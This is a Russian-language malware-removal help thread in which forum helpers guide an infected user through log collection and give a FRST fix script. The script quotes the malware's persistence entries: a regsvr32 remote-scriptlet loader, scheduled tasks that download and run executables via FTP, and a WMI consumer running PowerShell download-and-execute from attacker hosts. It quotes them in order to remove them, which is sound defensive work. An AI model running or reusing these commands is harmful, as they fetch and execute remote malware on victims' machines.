Junior Member
Вес репутации
14
Помогите удалить Virus
Вложения
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Уважаемый(ая) АлександрКалин , спасибо за обращение на наш форум!
Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи .
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, поддержите проект .
Здравствуйте!
Вы прикрепили не то, что нужно. Нужен архив с именем CollectionLog.zip
Junior Member
Вес репутации
14
[QUOTE=Sandor;1513086]Здравствуйте!
Вы прикрепили не то, что нужно. Нужен архив с именем CollectionLog.zip
Спасибо за ответ, выкладываю архив
Вложения
Пролечите систему с помощью KVRT . По окончании упакуйте папку C:\KVRT_Data\Reports в архив и прикрепите к следующему сообщению.
Соберите и прикрепите свежий CollectionLog.
Junior Member
Вес репутации
14
Добрый день!!! огромное спасибо что помогаете. Ситуация следующая, скачать не могу ни один антивирус браузер сразу закрывается. Скачал на другом компьютере через флешку скопировал, но он не хочет запускаться. Попробовал скачать Dr.Web Curelt он запускается что то там находит но половину вируса удалить не может. Компьютер перезагружаю но ситуация таже самая
Ясно. Сделаем так:
Скачайте Farbar Recovery Scan Tool (или с зеркала ) и сохраните на Рабочем столе.
Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Нажмите кнопку Scan .
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Junior Member
Вес репутации
14
С этим проблем небыло, скачалось без проблем
- - - - -Добавлено - - - - -
все получилось, выложил эти два файла
Вложения
Через Панель управления (Параметры) - Удаление программ (Приложения и возможности) - удалите нежелательное ПО:
Примите к сведению - после выполнения скрипта все открытые вкладки браузеров будут закрыты, произойдет выход из аккаунтов, временные файлы, корзина, история браузеров, куки и кэш будут очищены.
Отключите до перезагрузки антивирус. Выделите следующий код:
Код:
Start::
CreateRestorePoint:
() [File not signed] C:\Windows\Help\spoolys.exe <2>
(ssssssssss) [File not signed] C:\Windows\inf\aspnet\lsma12.exe
C:\Windows\Help\spoolys.exe
C:\Windows\inf\aspnet\lsma12.exe
HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ftp1202.site:280/v.sct scrobj.dll <==== ATTENTION
HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ftp1202.site:280/v.sct scrobj.dll <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-2795348791-575600697-2115862962-1000\...\Policies\Explorer: [DisallowRun] 1
HKU\S-1-5-21-2795348791-575600697-2115862962-1000\...\Policies\Explorer\DisallowRun: [1] eav_trial_rus.exe
HKU\S-1-5-21-2795348791-575600697-2115862962-1000\...\Policies\Explorer\DisallowRun: [2] avast_free_antivirus_setup_online.exe
HKU\S-1-5-21-2795348791-575600697-2115862962-1000\...\Policies\Explorer\DisallowRun: [3] eis_trial_rus.exe
HKU\S-1-5-21-2795348791-575600697-2115862962-1000\...\Policies\Explorer\DisallowRun: [4] essf_trial_rus.exe
HKU\S-1-5-21-2795348791-575600697-2115862962-1000\...\Policies\Explorer\DisallowRun: [5] hitmanpro_x64.exe
HKU\S-1-5-21-2795348791-575600697-2115862962-1000\...\Policies\Explorer\DisallowRun: [6] ESETOnlineScanner_UKR.exe
HKU\S-1-5-21-2795348791-575600697-2115862962-1000\...\Policies\Explorer\DisallowRun: [7] ESETOnlineScanner_RUS.exe
HKU\S-1-5-21-2795348791-575600697-2115862962-1000\...\Policies\Explorer\DisallowRun: [8] HitmanPro.exe
HKU\S-1-5-21-2795348791-575600697-2115862962-1000\...\Policies\Explorer\DisallowRun: [9] 360TS_Setup_Mini.exe
HKU\S-1-5-21-2795348791-575600697-2115862962-1000\...\Policies\Explorer\DisallowRun: [10] Cezurity_Scanner_Pro_Free.exe
HKU\S-1-5-21-2795348791-575600697-2115862962-1000\...\Policies\Explorer\DisallowRun: [11] Cube.exe
HKU\S-1-5-21-2795348791-575600697-2115862962-1000\...\MountPoints2: {4d456756-4c02-11ea-a701-101f74f1953a} - G:\SISetup.exe
HKU\S-1-5-21-2795348791-575600697-2115862962-1000\...\MountPoints2: {5a4402d4-5c7e-11ea-97d1-101f74f1953a} - G:\SISetup.exe
IFEO\uihost32.exe: [Debugger] ntsd -d
IFEO\uihost64.exe: [Debugger] ntsd -d
IFEO\vid001.exe: [Debugger] ntsd -d
GroupPolicy: Restriction ? <==== ATTENTION
GroupPolicy\User: Restriction ? <==== ATTENTION
GroupPolicy-Firefox: Restriction <==== ATTENTION
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
Task: {26AB22C9-C88A-414C-9F5D-10BBD08EEBE8} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: {2893D7B4-4DE8-475D-A476-7F6F64223C2C} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp1202.site>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
Task: {4F5EE9FA-ADB1-4BF6-8D3C-E9E355778065} - System32\Tasks\oka => cmd /c start c:\windows\inf\aspnet\lsma12.exe
Task: {9CCE035E-BA47-4710-9D34-5AFCE1A82F5D} - System32\Tasks\Mysa3 => cmd /c echo open ftp.ftp1202.site>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
Task: {CB8A8372-92AF-4BE9-B73C-B37C960C2C26} - System32\Tasks\Mysa => cmd /c echo open ftp.ftp1202.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION
Task: {DB2B464A-12ED-417A-B0A8-EBDBB1BB2D3F} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{ceb1067c-1946-49a5-bbb6-375e1165f501} <==== ATTENTION (Restriction - IP)
HKU\S-1-5-21-2795348791-575600697-2115862962-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://mail.ru/cnt/10445?gp=812208
Toolbar: HKU\S-1-5-21-2795348791-575600697-2115862962-1000 -> No Name - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - No File
FF Extension: (Домашняя страница Mail.Ru) - C:\Users\Александр\AppData\Roaming\Mozilla\Firefox\Profiles\nahd6ha2.default\Extensions\[email protected] [2020-04-28] [UpdateUrl:hxxps://crxmailru.cdnmail.ru/go_ffhp_update.json]
FF Extension: (Поиск Mail.Ru) - C:\Users\Александр\AppData\Roaming\Mozilla\Firefox\Profiles\nahd6ha2.default\Extensions\[email protected] [2020-04-28] [UpdateUrl:hxxps://crxmailru.cdnmail.ru/searchff/update.json]
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\autoconfig.js [2018-03-19] <==== ATTENTION (Points to *.cfg file)
FF ExtraCheck: C:\Program Files\mozilla firefox\cck2.cfg [2018-03-19] <==== ATTENTION
C:\Users\Александр\AppData\Local\Google\Chrome\User Data\Default\Extensions\ldgpjdiadomhinpimgchmeembbgojnjk
CHR HKU\S-1-5-21-2795348791-575600697-2115862962-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ldgpjdiadomhinpimgchmeembbgojnjk]
CHR HKLM-x32\...\Chrome\Extension: [pbefkdcndngodfeigfdgiodgnmbgcfha]
S2 supdate; C:\Program Files (x86)\Sputnik\Update\SputnikUpdate.exe [174704 2020-01-29] (Search Portal Sputnik Ltd -> Sputnik)
S3 supdatem; C:\Program Files (x86)\Sputnik\Update\SputnikUpdate.exe [174704 2020-01-29] (Search Portal Sputnik Ltd -> Sputnik)
2020-07-13 23:55 - 2020-07-14 08:34 - 000003170 _____ C:\Windows\system32\Tasks\oka
2020-07-13 20:54 - 2020-07-14 08:34 - 000003520 _____ C:\Windows\system32\Tasks\Mysa
2020-07-13 20:54 - 2020-07-14 08:34 - 000003506 _____ C:\Windows\system32\Tasks\Mysa3
2020-07-13 20:54 - 2020-07-14 08:34 - 000003426 _____ C:\Windows\system32\Tasks\Mysa2
2020-07-13 20:54 - 2020-07-14 08:34 - 000003190 _____ C:\Windows\system32\Tasks\Mysa1
2020-07-13 20:54 - 2020-07-14 08:34 - 000003186 _____ C:\Windows\system32\Tasks\ok
2020-07-03 14:50 - 2020-07-07 15:48 - 000180993 _____ C:\Windows\SysWOW64\a.txt
2020-07-03 14:50 - 2020-07-07 15:48 - 000000504 _____ C:\Windows\SysWOW64\ok.dat
2020-07-13 15:11 - 2020-06-09 15:49 - 000000000 __SHD C:\ProgramData\Doctor Web
2020-07-13 14:46 - 2020-06-09 15:49 - 000000000 __SHD C:\KVRT_Data
2020-06-30 18:19 - 2020-06-09 16:00 - 000000000 ___HD C:\Program Files\RDP Wrapper
2020-06-30 18:19 - 2020-06-09 15:49 - 000000000 __SHD C:\ProgramData\WindowsTask
2020-06-30 18:12 - 2020-06-09 15:49 - 000000000 __SHD C:\ProgramData\RunDLL
2020-06-30 18:12 - 2020-06-09 15:49 - 000000000 __SHD C:\ProgramData\RealtekHD
2020-06-30 18:11 - 2020-06-09 16:01 - 000000000 __SHD C:\ProgramData\Windows
2020-06-29 08:31 - 2020-01-29 12:24 - 000000000 ____D C:\Program Files (x86)\Sputnik
2020-06-09 15:49 C:\AdwCleaner
2020-07-13 14:46 C:\KVRT_Data
2020-06-09 15:49 C:\Program Files\AVAST Software
2020-06-09 15:49 C:\Program Files\AVG
2020-06-09 15:49 C:\Program Files\ByteFence
2020-06-09 15:49 C:\Program Files\Cezurity
2020-06-09 15:49 C:\Program Files\COMODO
2020-06-09 15:49 C:\Program Files\Enigma Software Group
2020-06-09 15:49 C:\Program Files\ESET
2020-06-09 15:49 C:\Program Files\Kaspersky Lab
2020-06-09 15:49 C:\Program Files\Malwarebytes
2020-06-09 15:49 C:\Program Files\SpyHunter
2020-06-09 15:49 C:\Program Files (x86)\360
2020-06-09 15:49 C:\Program Files (x86)\AVAST Software
2020-06-09 15:49 C:\Program Files (x86)\AVG
2020-06-09 15:49 C:\Program Files (x86)\Cezurity
2020-06-09 15:49 C:\Program Files (x86)\GRIZZLY Antivirus
2020-06-09 15:49 C:\Program Files (x86)\Kaspersky Lab
2020-06-09 15:49 C:\Program Files (x86)\Microsoft JDX
2020-06-09 15:49 C:\Program Files (x86)\Panda Security
2020-06-09 15:49 C:\Program Files (x86)\SpyHunter
2020-06-09 15:49 C:\Windows\speechstracing
2020-06-09 15:49 C:\Program Files\Common Files\McAfee
2020-06-09 15:49 C:\ProgramData\360safe
2019-12-23 10:42 C:\ProgramData\AVAST Software
2020-06-09 15:49 C:\ProgramData\Avira
2020-07-13 15:11 C:\ProgramData\Doctor Web
2020-06-09 15:49 C:\ProgramData\ESET
2020-06-09 15:49 C:\ProgramData\grizzly
2020-06-09 15:49 C:\ProgramData\Indus
2020-06-09 15:49 C:\ProgramData\Kaspersky Lab
2020-06-09 15:49 C:\ProgramData\Kaspersky Lab Setup Files
2020-06-09 15:49 C:\ProgramData\Malwarebytes
2020-06-09 15:49 C:\ProgramData\MB3Install
2020-06-09 15:49 C:\ProgramData\McAfee
2020-06-09 15:49 C:\ProgramData\Norton
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckamm4\"",Filter="__EventFilter.Name=\"fuckamm3\":: <==== ATTENTION
WMI:subscription\__EventFilter->fuckamm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\CommandLineEventConsumer->fuckamm4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http: (the data entry has 797 more characters).] <==== ATTENTION
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
2020-07-12 01:53 - 2020-07-14 05:57 - 002105344 _____ () [File not signed] c:\windows\debug\item.dat
AlternateDataStreams: C:\Windows:{4B9A1497-0817-47C4-9612-D6A1C53ACF57} [26]
FirewallRules: [{A248170E-04E6-4B8D-A019-3891EF7A64B4}] => (Allow) C:\Users\Александр\AppData\Local\Temp\Rar$EXa0.302\ROMServer.exe => No File
FirewallRules: [{546FE06C-34DE-4063-B51A-256ECC8D104F}] => (Allow) C:\Users\Александр\AppData\Local\Temp\Rar$EXa0.302\ROMServer.exe => No File
FirewallRules: [{AE0E6694-9148-4BAA-B996-1869FE2D0A0B}] => (Allow) LPort=443
FirewallRules: [{963AF872-8974-4DC6-B73E-DF764585CA35}] => (Allow) LPort=443
FirewallRules: [{5FE7CD44-9F24-446D-9535-85169DEA7F18}] => (Allow) LPort=443
FirewallRules: [{B8E2DA6D-008F-4F8B-8E28-26857BA69598}] => (Allow) LPort=443
FirewallRules: [{FA0230CE-B9D6-4060-821F-4B569DF40B79}] => (Allow) LPort=443
FirewallRules: [{2028014C-6091-437E-9B18-9F6CC6F75AF9}] => (Allow) LPort=443
FirewallRules: [{8A213997-EC16-4EAA-98C5-94B89B78775B}] => (Allow) LPort=443
FirewallRules: [{58546D9A-06E4-4B7D-BE8C-D1475FA9D229}] => (Allow) LPort=443
FirewallRules: [{E5B5E960-6987-4787-9DA6-F207E317A932}] => (Allow) LPort=443
FirewallRules: [{96D5FEE5-2602-45FC-BDE7-DE7E23240E45}] => (Allow) LPort=443
FirewallRules: [{D1AFC2B9-EEBA-4F5E-A68F-FDA6BA228A14}] => (Allow) LPort=443
FirewallRules: [{DC83D058-C4CD-43D6-9026-567923284B31}] => (Allow) LPort=443
FirewallRules: [{99EB1833-0056-4047-9D34-992E235B1EDA}] => (Allow) LPort=443
FirewallRules: [{DB1207D6-0C02-4D95-92D0-7AB3C1064F9F}] => (Allow) LPort=443
FirewallRules: [{289F84E9-7343-4D44-8CE4-B945DA489AED}] => (Allow) LPort=443
FirewallRules: [{14CF2AE4-8A0C-4AEB-99F1-32205F08193B}] => (Allow) LPort=443
FirewallRules: [{23461C99-D7AC-430D-833A-5A3A89F65B43}] => (Allow) C:\Users\Александр\AppData\Local\Temp\Rar$EXa0.914\ROMServer.exe => No File
FirewallRules: [{0DD9CFA9-4574-4908-996E-3D033874A392}] => (Allow) C:\Users\Александр\AppData\Local\Temp\Rar$EXa0.914\ROMServer.exe => No File
FirewallRules: [{8B091CBA-E1A0-481C-BA29-BDAF207578D0}] => (Allow) C:\Users\Александр\AppData\Local\Temp\Rar$EXa0.570\ROMServer.exe => No File
FirewallRules: [{1F60C7A1-BFB2-432C-A73A-1DF71810F906}] => (Allow) C:\Users\Александр\AppData\Local\Temp\Rar$EXa0.570\ROMServer.exe => No File
FirewallRules: [{F3CAF8B1-EC1B-45FE-B7EF-F7F6493F1FA8}] => (Allow) C:\Users\Александр\AppData\Local\Temp\Rar$EXa0.530\ROMServer.exe => No File
FirewallRules: [{808DC013-FD6B-4F02-82CF-6154A3414B3B}] => (Allow) C:\Users\Александр\AppData\Local\Temp\Rar$EXa0.530\ROMServer.exe => No File
FirewallRules: [{FB3EA614-BEE7-45A0-ADAF-2C11529F7F06}] => (Allow) C:\Users\Александр\AppData\Local\Sputnik\Sputnik\Application\browser.exe => No File
FirewallRules: [{CF9D636D-09E1-4F02-98A8-73B9E6099DD9}] => (Block) LPort=139
FirewallRules: [{04FE24A0-C9D1-40AA-8A4D-15448CB1586A}] => (Block) LPort=139
FirewallRules: [{C74F8D86-12A0-45EC-A06F-F09F110170D8}] => (Block) LPort=445
FirewallRules: [{059FBC78-5854-4FC6-82FD-57A30F24AAB1}] => (Block) LPort=445
FirewallRules: [{8A8CFEF1-0476-4EC2-BFD8-92066C154E5E}] => (Allow) LPort=3389
FirewallRules: [{2FE9D45E-DB13-4D35-AC45-4786B2F0FE9C}] => (Allow) C:\ProgramData\Windows\rutserv.exe => No File
FirewallRules: [{18100026-FBB8-4673-B9D0-BB209C14D7C6}] => (Block) LPort=445
FirewallRules: [{CFCE7799-7673-4F28-9BC9-0843FBA1F2C7}] => (Block) LPort=139
ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
EmptyTemp:
Reboot:
End::
Скопируйте выделенный текст (правой кнопкой - Копировать). Запустите FRST (FRST64) от имени администратора. Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.
Junior Member
Вес репутации
14
Так, сделал как вы сказали. Правда не с первого раза получилось, но потом все получилось как Вы написали ))) Фаил прикрепил.
Дальше какие действия ?
Вложения
Соберите ещё раз контрольный CollectionLog Автологером по правилам.
Junior Member
Вес репутации
14
Вложения
Хм, заразились по новой. Давайте проверим уязвимые места:
Загрузите SecurityCheck by glax24 & Severnyj , сохраните утилиту на Рабочем столе и извлеките из архива. Запустите двойным щелчком мыши (если Вы используете Windows XP ) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10 ) Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck , например C:\SecurityCheck\SecurityCheck.txt Прикрепите этот файл к своему следующему сообщению.
Junior Member
Вес репутации
14
Я проделал еще раз все процедуры которые вы писали и по моему все получилось, компьютер спокойно теперь заходит на сайты антивирусов и дает их скачать запустить, прогнал на вирусы все удалилось и работает отлично. Сделал контрольный CollectionLog Автологером отчет. Посмотрите пожалуйста
Вложения
Лог SecurityCheck.txt тоже сделайте.